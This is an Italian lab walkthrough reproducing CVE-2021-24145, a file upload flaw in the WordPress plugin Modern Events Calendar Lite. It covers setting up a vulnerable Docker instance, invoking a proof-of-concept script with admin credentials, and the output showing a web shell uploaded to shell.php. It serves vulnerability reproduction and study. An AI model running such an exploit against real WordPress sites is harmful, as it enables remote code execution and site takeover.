
Vulnerabilità di caricamento file in WordPress, plugin WordPress Modern Events Calendar Lite prima della versione 5.16.5
Vulnerabilità di caricamento file in WordPress, plugin Modern Events Calendar Lite per WordPress precedente alla versione 5.16.5 https://nvd.nist.gov/vuln/detail/CVE-2021-24145
Durante l'installazione, configurare il port forwarding nel file docker-compose.yml.
$ docker-compose up
Andare su http://[indirizzo-server-web]:porta/
Procedere con l'installazione di base.
Andare su [Plugins] -> [Add New] -> [Upload Plugin].
Caricare e installare modern-events-calendar-lite.5.16.2.zip.
La schermata seguente mostra l'installazione del plugin completata.
Una volta completata l'installazione, attivare il plugin.
python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]
$python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456
______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/
* Wordpress Plugin Modern Events Calendar Lite RCE
* @Hacker5preme
[+] Autenticazione riuscita!
[] Shell caricata su: http://172.30.1.48:80//wp-content/uploads/shell.php
